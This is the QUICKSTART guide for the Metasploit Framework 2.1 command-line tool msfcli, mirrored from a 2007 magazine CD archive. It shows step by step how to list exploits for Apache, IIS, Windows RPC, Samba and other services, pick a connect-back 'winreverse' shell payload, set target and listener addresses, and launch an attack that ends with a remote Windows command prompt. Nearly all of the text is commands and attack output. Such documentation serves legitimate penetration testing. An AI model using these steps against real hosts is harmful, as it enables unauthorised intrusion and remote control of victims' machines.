Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / docs / QUICKSTART.msfcli < prev next >

Wrap

Text File | 2006-06-30 | 7KB | 185 lines

1) List the available exploits and select one hdm@slasher framework $ ./msfcli __. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\ | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || | |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__| \/ \/ v2.1 \/ \/ |__| ============ = Exploits apache_chunked_win32 Apache Win32 Chunked Encoding blackice_pam_icq Blackice/RealSecure/Other ISS ICQ Parser Buffer Overflow exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding ia_webmail IA WebMail 3.x Buffer Overflow iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow iis50_printer_overflow IIS 5.0 Printer Buffer Overflow iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow imail_ldap IMail LDAP Service Buffer Overflow msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026 msrpc_dcom_ms03_039 Microsoft RPC DCOM MSO3-039 mssql2000_resolution MSSQL 2000 Resolution Overflow poptop_negative_read PoPToP Negative Read Overflow realserver_describe_linux RealServer Describe Buffer Overflow samba_nttrans Samba Fragment Reassembly Overflow samba_trans2open Samba trans2open Overflow sambar6_search_results Sambar 6 Search Results Buffer Overflow servu_mdtm_overflow Serv-U FTPD MDTM Overflow solaris_sadmind_exec Solaris sadmind Command Execution subversion_date PoPToP Negative Read Overflow warftpd_165_pass War-FTPD 1.65 PASS Overflow windows_ssl_pct Windows SSL PCT Overflow 2) Display the information for the selected exploit hdm@slasher framework $ ./msfcli apache S Name: Apache Win32 Chunked Encoding Version: $Revision: 1.7 $ Target OS: win32 Privileged: Yes Provided By: H D Moore <hdm [at] metasploit.com> [Artistic License] Available Targets: Windows NT/2K Brute Force Windows 2000 Windows NT Available Options: Exploit: Name Default Description -------- ------ ------- --------------------------- optional SSL Use SSL required RHOST The target address optional PAD Specify the exact pad value required RPORT 80 The target port Payload Information: Space: 8100 Avoid: 8 characters Description: This exploits the chunked encoding bug found in Apache versions 1.2.x to 1.3.24. This particular module will only work reliably against versions 1.3.17 on up running on Windows 2000 or NT. This exploit may complelely crash certain versions of Apache shipped with Oracle and various web application frameworks. This exploit could not be detected by versions of the Snort IDS prior to 2.1.2 :) References: http://www.osvdb.org/838 http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html 3) Show the available payloads hdm@slasher framework $ ./msfcli apache P Metasploit Framework Usable Payloads ==================================== winadduser Create a new user and add to local Administrators group winbind Listen for connection and spawn a shell winbind_stg Listen for connection and spawn a shell winbind_stg_upexec Listen for connection then upload and exec file winexec Execute an arbitrary command winreverse Connect back to attacker and spawn a shell winreverse_stg Connect back to attacker and spawn a shell winreverse_stg_ie Listen for connection, send address of GP/LL across, read/exec InlineEgg winreverse_stg_upexec Connect back to attacker and spawn a shell 4) Choose a payload and show the new combined option set hdm@slasher framework $ ./msfcli apache PAYLOAD=winreverse O Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ------- --------------------------- optional SSL Use SSL required RHOST The target address optional PAD Specify the exact pad value required RPORT 80 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ optional EXITFUNC seh Exit technique: "process", "thread", "seh" required LHOST Local address to receive connection required LPORT Local port to receive connection 5) Some exploits and payloads include an advanced option set hdm@slasher framework $ ./msfcli apache PAYLOAD=winreverse A Exploit and Payload Options =========================== Exploit (Msf::Exploit::apache_chunked_win32): --------------------------------------------- Name: PAD Default: 0 Specify the padding value to be used Payload (Msf::Payload::win32_reverse): -------------------------------------- 6) List the available targets and optionally select one hdm@slasher framework $ ./msfcli apache PAYLOAD=winreverse T Supported Exploit Targets ========================= 0 Windows NT/2K Brute Force 1 Windows 2000 2 Windows NT 5) Fill in options and try a vulnerability check hdm@slasher framework $ ./msfcli apache \ PAYLOAD=winreverse RHOST=192.168.1.241 RPORT=8080 \ LHOST=192.168.1.244 LPORT=5555 TARGET=2 C [*] Vulnerable server 'Apache/1.3.22 (Win32)' 6) Launch the actual exploit :) hdm@slasher framework $ ./msfcli apache \ PAYLOAD=winreverse RHOST=192.168.1.241 RPORT=8080 \ LHOST=192.168.1.244 LPORT=5555 TARGET=2 E [*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348... [*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352... [*] Connection from 192.168.1.241:1033... Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. c:\program files\apache group\apache>